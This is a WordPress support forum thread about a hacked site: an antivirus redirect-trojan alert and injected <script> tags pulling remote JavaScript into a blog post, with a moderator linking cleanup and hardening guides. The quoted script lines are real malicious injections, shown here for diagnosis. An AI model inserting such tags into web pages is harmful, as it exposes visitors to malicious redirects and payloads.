Support » Fixing WordPress » Security breach?

Viewing 10 replies - 1 through 10 (of 10 total)
  • Thread Starter matthewpaul

    (@matthewpaul)

    I was able to reproduce the issue again.

    When visiting the site, my virus protection program, Avast shows this message:

    TROJAN HORSE BLOCKED

    avast Web Shield has blocked a threat. No further action is required.

    Object: http://edisonsbar.com/in.cgi?4|>{gzip}
    Infection: HTML:RedirME-inf [Trj]
    Action: Connection aborted
    Process: C:\Program Files\Mozilla\Firefox\firefox.exe

    The threat was detected and blocked while downloading an item from the web.

    Thread Starter matthewpaul

    (@matthewpaul)

    This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:

    <h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>

    and

    <h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>

    I never added this code and it’s not in the template file of the theme.

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Thread Starter matthewpaul

    (@matthewpaul)

    My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven’t had any other reports of this.

    Thread Starter matthewpaul

    (@matthewpaul)

    It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    Remove the code from the post, then run through this guide to make sure that nothing else is wrong:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    When you’re done, implement some (if not all) of the recommended security measures:

    http://codex.wordpress.org/Hardening_WordPress

    Thread Starter matthewpaul

    (@matthewpaul)

    Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    I honestly don’t recommend any of them. Most of the current security plugins simply scan for “vulnerabilities” and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It’s better to follow the guide that I linked to and manually implement the security measures.

    Thread Starter matthewpaul

    (@matthewpaul)

    Thanks.

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    You’re welcome!

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Security breach?’ is closed to new replies.